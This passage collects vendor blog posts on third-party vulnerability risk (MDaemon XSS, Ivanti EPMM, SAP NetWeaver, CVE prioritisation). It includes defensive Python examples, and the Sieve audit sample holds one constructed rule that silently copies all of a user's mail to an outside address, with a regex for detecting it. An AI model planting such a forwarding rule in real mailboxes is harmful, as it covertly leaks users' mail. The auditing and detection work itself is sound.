  2. Can you confirm if you have implemented a strict Content Security Policy to block inline scripts and disabled automatic HTML email rendering as recommended in the advisory?
  3. Have you audited Sieve rules to identify and remove any unauthorized mail-forwarding rules in users’ mailboxes that could be a result of the SpyPress stealer?
  4. Are you monitoring for indicators such as unusual HTTP POSTs to compromised webmail servers, creation of atypical Sieve rules, and outbound traffic to known SpyPress C2 endpoints to detect any potential exploitation of CVE-2024-11182?

Remediation Recommendations for Vendors Affected by CVE-2024-11182

Vendors utilizing MDaemon Email Server should take the following actions:

  • Immediate Patching: Upgrade to MDaemon version 24.5.1 or later to address the vulnerability.
  • Disable HTML Rendering: Configure webmail clients to disable automatic HTML email rendering or enforce strict Content Security Policies (CSP) to mitigate XSS risks.
  • Audit and Monitor: Regularly review mail forwarding rules and monitor for unusual activities, such as unexpected HTTP POST requests to known malicious domains.
  • User Training: Educate users about the risks of opening emails from unknown sources and encourage reporting of suspicious activities.
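Patching closes the XSS, but it does not remove a Sieve rule an attacker already planted, which is why the “Audit and Monitor” item and question 3 above matter. The following added example, not MDaemon code, audits per-user Sieve scripts for redirect rules and rates them: a forward to a domain outside the organisation is high severity, an unconditional forward inside it is medium, and a conditional internal forward (ordinary delegation) is ignored. The three scripts and the organisation domain list are constructed; it handles the common `redirect [:copy] "address";` form and not Sieve multi-line `text:` strings.

```python
"""Audit per-user Sieve filter scripts for mail-forwarding rules of the
kind used for post-compromise persistence. Added example, not MDaemon
code; scripts and the organisation's domain list are constructed."""
import re
from typing import Dict, List

ORG_DOMAINS = {"example.org"}   # assumption: the organisation's own mail domains

# redirect [:tag ...] "address";   tags such as :copy may precede the address
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:[a-z]+)*)\s+"([^"]+)"\s*;', re.IGNORECASE)
COMMENT_RE = re.compile(r"#[^\n]*")


def _strip_comments(script: str) -> str:
    """Drop '#' comments so a commented-out redirect is not counted."""
    return COMMENT_RE.sub("", script)


def _brace_depth(text: str, pos: int) -> int:
    """Block nesting depth at pos; 0 means the statement runs for every message."""
    head = text[:pos]
    return head.count("{") - head.count("}")


def audit_script(user: str, script: str) -> List[Dict[str, object]]:
    """Findings for one user's script."""
    findings: List[Dict[str, object]] = []
    text = _strip_comments(script)
    for m in REDIRECT_RE.finditer(text):
        tags = m.group(1).lower().split()
        target = m.group(2).strip()
        domain = target.rsplit("@", 1)[-1].lower()
        external = domain not in ORG_DOMAINS
        unconditional = _brace_depth(text, m.start()) == 0
        silent_copy = ":copy" in tags   # original stays in the mailbox, so nothing looks missing
        if external:
            severity = "high"
        elif unconditional:
            severity = "medium"
        else:
            continue   # conditional forward inside the organisation: ordinary delegation
        findings.append({
            "user": user, "target": target, "external": external,
            "unconditional": unconditional, "silent_copy": silent_copy,
            "severity": severity,
        })
    return findings


def audit_all(scripts: Dict[str, str]) -> List[Dict[str, object]]:
    """Findings across all users, high severity first."""
    out: List[Dict[str, object]] = []
    for user, script in scripts.items():
        out.extend(audit_script(user, script))
    return sorted(out, key=lambda f: (f["severity"] != "high", f["user"]))


# Constructed sample scripts.
SCRIPTS = {
    "alice": 'require ["fileinto"];\nif header :contains "subject" "[list]" {\n  fileinto "Lists";\n}\n',
    "bob": 'require ["copy"];\n# added 2025-05-12\nredirect :copy "archive-7731@mail-relay.example";\n',
    "carol": 'if address :is "from" "boss@example.org" {\n  redirect "carol.assistant@example.org";\n}\n',
}

if __name__ == "__main__":
    for f in audit_all(SCRIPTS):
        print(f["severity"], f["user"], "->", f["target"],
              "copy" if f["silent_copy"] else "move",
              "unconditional" if f["unconditional"] else "conditional")
```

The `:copy` flag is the one to watch: a rule that silently copies every message to an outside mailbox leaves the user’s inbox looking normal, which is exactly what makes this persistence technique survive the patch. Run the audit against every mailbox, not only the ones whose owners reported an odd invite.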

How Can TPRM Professionals Leverage Black Kite for CVE-2024-11182?

Black Kite provides visibility into third-party vulnerabilities, including CVE-2024-11182. By utilizing Black Kite’s platform, TPRM professionals can:

  • Identify Exposure: Determine which vendors are running vulnerable versions of MDaemon Email Server.
  • Assess Risk: Evaluate the potential impact of the vulnerability on the organization’s supply chain.
  • Monitor Remediation: Track vendors’ progress in addressing the vulnerability and ensure timely patching.
Black Kite’s MDaemon Email Server FocusTag™ details critical insights on the event for TPRM professionals.

Strengthening TPRM with Black Kite’s FocusTags™

When high-impact vulnerabilities like those found in Zimbra, DrayTek Vigor, Atlassian Jira Data Center, Tornado, and MDaemon emerge, time is of the essence. Black Kite’s FocusTags™ offer organizations a strategic advantage by transforming complex threat data into actionable intelligence—enabling faster, more focused responses to third-party exposure.

Here’s how FocusTags™ enhance your TPRM program:

  • Vendor-Specific Vulnerability Detection: Black Kite pinpoints which of your vendors are at risk based on real-world data, including IPs and subdomains associated with vulnerable assets.
  • Prioritized Risk Management: FocusTags™ help organizations allocate resources where it matters most—toward vendors affected by the most critical or actively exploited vulnerabilities.
  • Informed Vendor Dialogue: Instead of generic outreach, you can ask precise, vulnerability-specific questions to assess a vendor’s mitigation strategy and security posture.
  • Streamlined Incident Response: With enriched threat context and timely updates, FocusTags™ empower your TPRM team to act decisively when new vulnerabilities arise.

By operationalizing Black Kite’s FocusTags™, TPRM professionals can cut through the noise and quickly narrow their focus to the vendors that truly require attention—enhancing resilience in an ever-evolving threat landscape.

About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • Zimbra – May2025 : CVE-2024-27443, Cross-Site Scripting (XSS) Vulnerability in Zimbra Collaboration (ZCS).
  • DrayTek Vigor – May2025 : CVE-2024-12987, OS Command Injection Vulnerability in DrayTek Vigor Routers.
  • Atlassian Jira Data Center : CVE-2025-22157, Privilege Escalation Vulnerability in Jira Core Data Center, Jira Core Server, Jira Service Management Data Center, Jira Service Management Server.
  • Tornado Web Server : CVE-2025-47287, DoS Vulnerability in Tornado Web Server.
  • MDaemon Email Server : CVE-2024-11182, Cross-Site Scripting (XSS) Vulnerability in MDaemon Email Server.
  • Ivanti EPMM – May2025 : CVE-2025-4427, CVE-2025-4428, Authentication Bypass and Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile (EPMM)
  • SysAid On-Premises : CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
  • Apache ActiveMQ – May2025 : CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
  • Webmin : CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
  • Couchbase Server : CVE-2025-46619, LFI Vulnerability in Couchbase Server.
  • SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
  • Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
  • Fortinet Symlink Backdoor : CVE-2022-42475, CVE-2024-21762, CVE-2023-27997, Arbitrary Code Execution Vulnerability, Numeric Truncation Error, Heap-based Buffer Overflow Vulnerability, Out-of-bounds Write Vulnerability in FortiGate devices.
  • SonicWall SSLVPN Gen7 : CVE-2025-32818, Null Pointer Dereference Vulnerability, DoS Vulnerability in SonicWall SSLVPN Gen 7 devices.
  • Redis Server : CVE-2025-21605, Allocation of Resources Without Limits or Throttling in Redis Servers.
  • Adobe ColdFusion : CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego : CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure : CVE‑2025‑22457, Stack‑based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch : CVE‑2024‑48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO : CVE‑2025‑31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX : CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM : CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server : CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025 : CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.


The post Focus Friday: TPRM Insights into Zimbra, Draytek Vigor, Atlassian Jira Data Center, Tornado, and MDaemon Vulnerabilities appeared first on Black Kite.

How to Implement Vulnerability Management in TPRM

22 May 2025 at 12:08

Written by: Ferhat Dikbiyik, Chief Research & Intelligence Officer

With over 40,000 vulnerabilities disclosed last year—a 38% jump from the year prior—the real challenge for third-party risk management (TPRM) professionals isn’t knowing which risks exist. It’s knowing which ones to act on and how—a task made particularly difficult when managing risk across hundreds of vendors.

In Part 1 of our series, I introduced a three-dimensional approach to cybersecurity vulnerability management in TPRM—detailed in our 2025 Supply Chain Vulnerability Report—to help teams prioritize vulnerabilities in the supply chain based on severity, exploitability, and exposure. This dramatically narrows the field from tens of thousands of Common Vulnerabilities & Exposures (CVEs) to a much more manageable number.

But identifying risk is only half of the process. Acting on it is the other half.

In this second video, I walk through how TPRM teams can operationalize vulnerability intelligence, moving beyond theoretical prioritization to real-world application. Using tools like Black Kite’s FocusTags™, teams can gain clear visibility into which vulnerabilities are most urgent, which vendors might be exposed, and what steps to take for remediation.


Act On the Right Vulnerabilities With FocusTags™

A vulnerability’s CVSS score can clue you into potential severity, while its EPSS score can help predict the likelihood of exploitation. But neither tells the full story. Some vulnerabilities look dangerous on paper but are rarely exploited, while others fly under the radar until they become the entry point for a major breach. 

Black Kite’s FocusTags help security teams tell the difference, surfacing the CVEs that are highly likely to be exploited regardless of their severity level. They do this by layering in real-world signals that indicate whether attackers are likely to go after a given flaw.

How to Filter CVEs by Real-World Exploitability:

  1. CISA KEV inclusion: Has the vulnerability already been exploited in the wild?
  2. Public exploit availability: Are proof-of-concept (PoC) exploits readily available?
  3. Threat actor interest: Has it been mentioned in underground forums or used in attack campaigns?
  4. Community discussions: Is there a surge in security researchers analyzing it?
  5. Zero-day status: Is it newly disclosed with limited patches available?
  6. Supply chain impact: Does it affect widely used products with third-party exposure?

Analyzing these risk factors, FocusTags help TPRM teams detect not just the most severe vulnerabilities, but also the ones most likely to be weaponized. Instead of reacting to every “critical” CVE, teams can focus on the ones that pose the greatest risk to their supply chain.
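The six signals above can be turned into a repeatable ordering rather than a judgment call. The following is an added example, not Black Kite’s FocusTag logic: it scores each CVE on the listed signals plus EPSS, amplifies the score by how many vendors in your ecosystem likely run the product, and ranks on that rather than on CVSS. The weights, the threshold and the sample records (placeholder IDs, not real CVEs) are assumptions for illustration.

```python
"""Rank CVEs by real-world exploitability signals instead of CVSS alone.

Added example, not Black Kite's FocusTag implementation. Weights, the
threshold and the sample records are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class CveRecord:
    cve_id: str
    cvss: float                          # base severity, 0.0-10.0
    epss: float                          # EPSS probability of exploitation, 0.0-1.0
    in_kev: bool = False                 # 1. listed in CISA KEV (exploited in the wild)
    public_poc: bool = False             # 2. public proof-of-concept exploit exists
    threat_actor_interest: bool = False  # 3. seen in campaigns or underground chatter
    community_surge: bool = False        # 4. spike in researcher analysis
    zero_day: bool = False               # 5. newly disclosed, patch not broadly available
    exposed_vendors: int = 0             # 6. vendors in your ecosystem likely running it


# Assumed weights: confirmed exploitation outweighs every other signal.
WEIGHTS = {
    "in_kev": 40,
    "public_poc": 20,
    "threat_actor_interest": 15,
    "zero_day": 10,
    "community_surge": 5,
}
EPSS_WEIGHT = 30        # scales the 0..1 EPSS probability into the same range
FOCUS_THRESHOLD = 40.0  # assumed cut-off for "act now"


def exploitability_score(rec: CveRecord) -> float:
    """Weighted sum of exploitation signals, amplified by supply-chain exposure."""
    score = sum(w for sig, w in WEIGHTS.items() if getattr(rec, sig))
    score += rec.epss * EPSS_WEIGHT
    # A CVE nobody in your ecosystem runs is not your problem; one that many
    # vendors run is amplified (capped so exposure alone cannot dominate).
    exposure_factor = min(1.0 + rec.exposed_vendors / 10.0, 3.0)
    return round(score * exposure_factor, 1)


def needs_focus(rec: CveRecord) -> bool:
    return exploitability_score(rec) >= FOCUS_THRESHOLD


def rank(records: List[CveRecord]) -> List[CveRecord]:
    """Most urgent first; CVSS only breaks ties between equally exploitable CVEs."""
    return sorted(records, key=lambda r: (exploitability_score(r), r.cvss), reverse=True)


# Constructed sample records (placeholder IDs, not real CVEs).
SAMPLE = [
    # Critical on paper, no exploitation signals, nobody in the ecosystem runs it.
    CveRecord("CVE-EXAMPLE-0001", cvss=9.8, epss=0.02),
    # "Medium" CVSS, but in KEV, with a public PoC, and widely deployed.
    CveRecord("CVE-EXAMPLE-0002", cvss=5.3, epss=0.50, in_kev=True,
              public_poc=True, threat_actor_interest=True, exposed_vendors=12),
    # Some chatter and a PoC, moderate exposure: watch, not yet act.
    CveRecord("CVE-EXAMPLE-0003", cvss=7.2, epss=0.10, public_poc=True,
              community_surge=True, exposed_vendors=3),
]

if __name__ == "__main__":
    for rec in rank(SAMPLE):
        print(rec.cve_id, rec.cvss, exploitability_score(rec),
              "FOCUS" if needs_focus(rec) else "")
```

Run as written, the CVSS 5.3 record lands at the top of the list and the CVSS 9.8 record at the bottom, which is the point of the section: severity and urgency are different axes.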

Risk Hunting, Not Just Monitoring

Most TPRM programs still depend on slow, reactive processes—waiting for vendor disclosures, following up on questionnaires, and hoping for timely responses. But the gap between disclosure and exploitation is shrinking fast: In 2021, attackers took 42 days on average to exploit a new CVE. By 2023, that window dropped to just 5 days. 

When exploitation moves that quickly, speed matters.

FocusTags enable a more proactive approach, helping security teams shift from passive monitoring to active risk hunting. Through Black Kite’s Risk Intelligence page, teams can identify which vendors are likely exposed, track changes in exposure over time, and access vendor-specific guidance to drive faster remediation.

To make action even more precise, we recently introduced Vulnerability Intelligence Briefs (VIBs) which offer detailed views of each CVE and where they are found in our customers’ supply chains. Think of them like baseball cards, but for vulnerabilities: each one gives you the essential stats you need to understand the risk and act fast.

If a CVE affects a vendor in your ecosystem, the brief tells you who’s likely running it and what questions to ask to confirm and resolve it. With these insights, you can act early, armed with the data needed to initiate informed, targeted vendor outreach.

The Future of TPRM Is Intelligence in Action

Third-party risk management isn’t about chasing every vulnerability—it’s about knowing which ones warrant your attention and moving quickly. And that requires more than static scores or vendor questionnaires. 

As exploitation timelines shrink and supply chains become more complex, security teams need context on which they can act. Tools like FocusTags help meet that need, highlighting the vulnerabilities that require immediate attention due to exposure, exploitability, and third-party risk.

This kind of actionable vulnerability assessment is what defines the future of TPRM. By understanding attacker behavior, identifying vendor exposure, and prioritizing action based on real-world signals, security teams can move beyond reactive patching and toward a more strategic defense of their third-party ecosystem.

Read the full 2025 Supply Chain Vulnerability Report for more insights on how to apply vulnerability intelligence across your vendor ecosystem.





FOCUS FRIDAY: TPRM Insights on Ivanti EPMM and SAP NetWeaver Vulnerabilities – Ongoing Threat Actor/Ransomware Groups Activity

16 May 2025 at 09:03

Written by: Ferdi Gül

Welcome to this week’s Focus Friday, where we delve into high-profile incidents from a Third-Party Risk Management (TPRM) perspective. This week, we’re focusing on vulnerabilities discovered in Ivanti’s Endpoint Manager Mobile (EPMM). Specifically, we’ll address two critical flaws, CVE-2025-4427 (Authentication Bypass) and CVE-2025-4428 (Remote Code Execution), which, when exploited together, allow unauthenticated attackers to bypass authentication and execute arbitrary code remotely on affected systems. These vulnerabilities, if left unchecked, could pose a serious threat to organizations using Ivanti EPMM for mobile device management. Read on to explore the details and how Black Kite’s FocusTags™ can assist in managing the associated risks.

Filtered view of companies with Ivanti EPMM – May2025 FocusTag™ on the Black Kite platform.

What is the Ivanti EPMM RCE and Authentication Bypass Vulnerability? (CVE-2025-4427, CVE-2025-4428)

Ivanti Endpoint Manager Mobile (EPMM) has two vulnerabilities, CVE-2025-4427 and CVE-2025-4428, that are critical for organizations using this software for mobile device management. These vulnerabilities, when chained together, allow unauthenticated attackers to bypass authentication and execute arbitrary code remotely on the affected systems.

  • CVE-2025-4427: This is an authentication bypass vulnerability that allows attackers to access protected resources without valid credentials. It has a medium severity level with a CVSS score of 5.3 and an EPSS score of 0.94%.
  • CVE-2025-4428: This vulnerability is a remote code execution (RCE) flaw that enables attackers to execute arbitrary code on the target system. This vulnerability has a high severity level with a CVSS score of 7.2 and an EPSS score of 0.51%.

Both vulnerabilities were discovered and publicly disclosed in May 2025, and there are reports of active exploitation in the wild. However, no PoC exploit code has been publicly released. The vulnerabilities were not added to CISA’s KEV catalog as of the time of disclosure.

Why Should TPRM Professionals Care About These Vulnerabilities?

For third-party risk management (TPRM) professionals, these vulnerabilities pose a severe risk because they undermine the confidentiality, integrity and availability of the mobile device management (MDM) infrastructure. An MDM server holds device inventories and configuration profiles for an entire fleet, so a compromise of Ivanti EPMM can give an attacker unauthorized access to, and potentially control over, the managed devices and the networks they connect to.

If attackers successfully exploit these vulnerabilities, they could gain access to sensitive data and internal configurations, leading to further lateral movement in the network. This makes it essential for TPRM professionals to assess the risk posed by vendors using Ivanti EPMM, especially those running vulnerable versions.

What Questions Should TPRM Professionals Ask Vendors About Ivanti EPMM Vulnerabilities?

  • Have you applied the latest security patches to Ivanti EPMM (versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1)?
  • What access control measures do you have in place to secure the Ivanti EPMM API, such as using a Web Application Firewall (WAF) or Portal ACLs?
  • Can you confirm whether any unusual API requests or failed authentication attempts have been detected in your logs?
  • If your organization is unable to immediately upgrade Ivanti EPMM, what mitigation strategies are in place to reduce the impact of these vulnerabilities?

Remediation Recommendations for Vendors Subject to This Risk

  • Upgrade Ivanti EPMM to a fixed version: Apply the patches available in versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1 to address both CVE-2025-4427 and CVE-2025-4428.
  • Implement strong access control: Use Portal ACLs or an external WAF to restrict API access and ensure that only authorized services and IP addresses can interact with the EPMM API.
  • Review and strengthen integrations: Ivanti notes that restricting API access with Portal ACLs or a WAF can affect integrations such as Windows Autopilot and the Microsoft Graph API, so verify that these still function after the mitigation is applied and adjust allow-lists accordingly rather than loosening the restriction.
  • Monitor for signs of exploitation: Regularly review logs for failed authentication attempts and abnormal API requests, and follow up with Ivanti support if exploitation is suspected.

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite’s FocusTag for Ivanti EPMM highlights the affected versions and helps TPRM professionals quickly identify vendors exposed to these critical vulnerabilities. By using Black Kite’s platform, TPRM teams can determine which vendors are affected, identify any potentially vulnerable assets (like IP addresses and subdomains), and prioritize outreach to those vendors for remediation.

The FocusTag also provides actionable intelligence, such as the specific versions at risk and recommendations for mitigations. This enables organizations to proactively manage their risk exposure and make data-driven decisions.

Since this is a new FocusTag, it provides an updated and detailed analysis of the risk posed by Ivanti EPMM vulnerabilities. Black Kite customers can operationalize this tag by integrating the identified vulnerabilities into their risk management workflows, ensuring a more targeted and efficient vendor outreach process.

Black Kite’s Ivanti EPMM – May2025 FocusTag™ details critical insights on the event for TPRM professionals.

Update on SAP NetWeaver Vulnerabilities: Threat Actor Activity Continues

In April 2025, Black Kite’s FocusTag for SAP NetWeaver included a series of vulnerabilities that continue to pose a significant threat to organizations relying on this enterprise platform. As of May 2025, the situation has escalated, with multiple ransomware groups now actively exploiting these vulnerabilities.

CVE-2025-42999, an insecure deserialization vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader, has been added to the existing SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag. On its own it requires a privileged user to upload untrusted serialized content, which, when deserialized, can severely compromise the system’s confidentiality, integrity, and availability; chained with CVE-2025-31324, the missing-authorization flaw in the same Metadata Uploader, that privilege requirement falls away and the upload can be reached without authentication.

The vulnerability has been actively exploited by several threat actor groups, including notorious ransomware gangs. As detailed in SAP’s May 2025 Security Patch Day alert, the RansomEXX and BianLian ransomware groups are targeting SAP NetWeaver systems with this flaw. While no ransomware payloads have been successfully deployed, the ongoing exploitation is a stark reminder of the continuing risk posed by this vulnerability. Additionally, several Chinese APT groups are also targeting unpatched NetWeaver instances, with evidence suggesting strategic objectives tied to espionage.

What Does This Mean for TPRM Professionals?

The addition of CVE-2025-42999 to the SAP NetWeaver FocusTag further emphasizes the critical nature of this vulnerability. TPRM professionals must now be even more vigilant in identifying vendors and third parties that rely on SAP NetWeaver systems. With active exploitation reported in the wild, including by sophisticated ransomware actors, the risk to organizations’ operational continuity is heightened.

If you’re managing third-party risks related to SAP NetWeaver, it is crucial to ensure that vendors have applied the latest patches and are actively monitoring for suspicious activity, especially around Visual Composer and its related components. Prompt remediation and proactive monitoring will be key to preventing a potential breach.

For those following the SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag, stay informed on new CVEs and exploit activity to adjust your risk mitigation strategies accordingly.

Enhancing TPRM Strategies with Black Kite’s FocusTags™

In today’s rapidly evolving cybersecurity landscape, staying ahead of vulnerabilities is crucial for robust Third-Party Risk Management (TPRM). Black Kite’s FocusTags™ provide essential insights and tools to effectively manage these risks, especially in the face of emerging threats like those found in Ivanti EPMM and SAP NetWeaver.

Here’s how Black Kite’s FocusTags™ can enhance your TPRM strategy:

  • Real-Time Vulnerability Tracking: FocusTags™ allow TPRM professionals to quickly identify vendors affected by the latest vulnerabilities, enabling faster, more strategic responses.
  • Risk Prioritization: FocusTags™ help prioritize risks based on the severity of vulnerabilities and the importance of affected vendors, ensuring resources are allocated where they’re needed most.
  • Informed Vendor Conversations: FocusTags™ facilitate targeted and meaningful discussions with vendors, addressing their specific security posture in relation to identified vulnerabilities.
  • Comprehensive Security Overview: With a clear, broad view of the threat landscape, FocusTags™ contribute to stronger, more proactive cybersecurity strategies.

Black Kite’s FocusTags™ transform complex cyber threat data into actionable intelligence, empowering TPRM professionals to effectively manage risks, reduce exposure, and bolster security.




About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • Ivanti EPMM – May2025: CVE-2025-4427, CVE-2025-4428, Authentication Bypass and Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile (EPMM)
  • SysAid On-Premises: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
  • Apache ActiveMQ – May2025: CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
  • Webmin: CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
  • Couchbase Server: CVE-2025-46619, LFI Vulnerability in Couchbase Server.
  • SAP NetWeaver VCFRAMEWORK: CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
  • Apache Tomcat – Apr2025: CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
  • Fortinet Symlink Backdoor: CVE-2022-42475, CVE-2024-21762, CVE-2023-27997, Arbitrary Code Execution Vulnerability, Numeric Truncation Error, Heap-based Buffer Overflow Vulnerability, Out-of-bounds Write Vulnerability in FortiGate devices.
  • SonicWall SSLVPN Gen7: CVE-2025-32818, Null Pointer Dereference Vulnerability, DoS Vulnerability in SonicWall SSLVPN Gen 7 devices.
  • Redis Server: CVE-2025-21605, Allocation of Resources Without Limits or Throttling in Redis Servers.
  • Adobe ColdFusion: CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego: CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure: CVE-2025-22457, Stack-based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch: CVE-2024-48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO: CVE-2025-31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM: CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server: CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025: CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.
  • SAP NetWeaver – Mar2025: CVE-2017-12637, Directory Traversal Vulnerability in SAP NetWeaver Application Server.



Why Counting CVEs Misses the Real Third-Party Risk

15 May 2025 at 09:27

Written by: Dr. Ferhat Dikbiyik, Chief Research & Intelligence Officer

“What percentage of CVEs do you cover?” 

It’s a question we hear a lot at Black Kite. It’s reasonable on the surface, but ultimately misleading.

It’s like asking a meteorologist how many weather events they track. The number might be high, but it tells you nothing about whether a severe storm is headed for your house. The same logic applies here. The total count of vulnerabilities a platform covers—or claims to cover—doesn’t actually tell you how well it assesses risk to your business.

At Black Kite, we don’t optimize for volume. We optimize for relevance, discoverability, and actionability. Because when it comes to third-party risk, more data is not necessarily better data. It’s just more noise.

CVE ‘Coverage’ Doesn’t Tell the Whole Story

More than 40,000 CVEs were published in 2024. Narrow it down to those with a CVSS score above 9.0, and you’re still looking at more than 4,400 critical issues.

Understandably, many security teams start with scale: How much of that are we tracking? However, “coverage” is a flawed metric. Here’s why:

1. It depends entirely on the scope.
What’s being covered? Every CVE ever published? Just critical ones? Only those with active exploitation? The definition of “coverage” varies so widely that it becomes almost meaningless.

2. Visibility is variable.
We identify vulnerable software versions only when they’re visible via OSINT—through headers, banners, exposed services, and so on. Not every version leaves enough of a fingerprint to be seen externally (i.e., discoverable by bad actors). As detection techniques evolve, our coverage evolves. This isn’t a static number.

3. More CVEs don’t mean better insight.
If a system is severely outdated, it’s already high-risk. Tagging it with 500 additional CVEs doesn’t make it more actionable. In fact, it often dilutes the signal. What matters is knowing the right vulnerabilities, not all of them.

The takeaway? CVE count is a distraction. What’s important is whether the vulnerabilities you can see are the ones that matter—and whether they’re likely to be exploited in the wild.

What Actually Matters in Vulnerability Intelligence

At Black Kite, our job isn’t to show you every CVE (although we do offer quite a robust CVE database with TPRM insights to the public). For our customers, our job is to surface the few dozen vulnerabilities that truly matter for your vendor ecosystem—so you can act quickly and decisively.

We get there in two ways.

1. Auto-Scanning for Patch Management Risk

Our platform continuously scans exposed infrastructure using passive OSINT techniques like banner grabbing, protocol response analysis, and header inspection. From that, we extract product and version data (when available), match it to known Common Platform Enumerations (CPEs), and map it to vulnerabilities from NIST’s National Vulnerability Database.

We apply strict filters to keep the output meaningful:

  • Focus on CVEs from the past two years unless they’re especially high-impact.
  • Exclude low-severity vulnerabilities.
  • Prioritize CVEs likely to be discoverable via OSINT.
  • Limit the number of CVEs associated with a given asset.

For example, if we find a server running Windows Server 2008 R2, we flag the 10 most relevant CVEs. We don’t tag all 500-plus known vulnerabilities for that product. The additional volume wouldn’t change the risk signal. It’s already high.
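The pipeline described in this section (fingerprint, map to a CPE, look up CVEs, then apply the four filters) is simple enough to show end to end. The following is an added example, not Black Kite’s scanner: it parses a constructed Server header, builds a CPE 2.3 name, matches it against a constructed mini NVD-style table with placeholder CVE IDs, and applies the age, severity, OSINT-discoverability and per-asset cap filters. The banner patterns, table rows, cut-offs and the fixed “today” date are all assumptions.

```python
"""Passive fingerprint -> CPE -> filtered CVE list.

Added example, not Black Kite's scanner. Banner patterns, the NVD-style
rows (placeholder IDs), the cut-offs and AS_OF are assumptions.
"""
import re
from datetime import date
from typing import List, Optional, Tuple

AS_OF = date(2025, 5, 15)  # constructed "today" so the example is deterministic

# Assumed banner-to-CPE patterns: (vendor, product, regex capturing the version).
BANNER_PATTERNS = [
    ("apache", "http_server", re.compile(r"Apache/(\d+(?:\.\d+)+)")),
    ("openbsd", "openssh", re.compile(r"OpenSSH_(\d+\.\d+(?:p\d+)?)")),
    ("microsoft", "internet_information_services", re.compile(r"Microsoft-IIS/(\d+\.\d+)")),
]

# Constructed NVD-style rows: (cve_id, vendor, product, fixed_in, published, cvss, osint_discoverable).
VULN_DB = [
    ("CVE-EXAMPLE-0001", "apache", "http_server", "2.4.51", date(2021, 10, 7), 9.8, True),   # old but critical
    ("CVE-EXAMPLE-0002", "apache", "http_server", "2.4.50", date(2021, 10, 5), 7.5, True),   # old, not critical
    ("CVE-EXAMPLE-0003", "apache", "http_server", "2.4.58", date(2024, 4, 1), 7.5, False),   # recent, hard to see from outside
    ("CVE-EXAMPLE-0004", "apache", "http_server", "2.4.60", date(2024, 7, 1), 3.1, True),    # low severity
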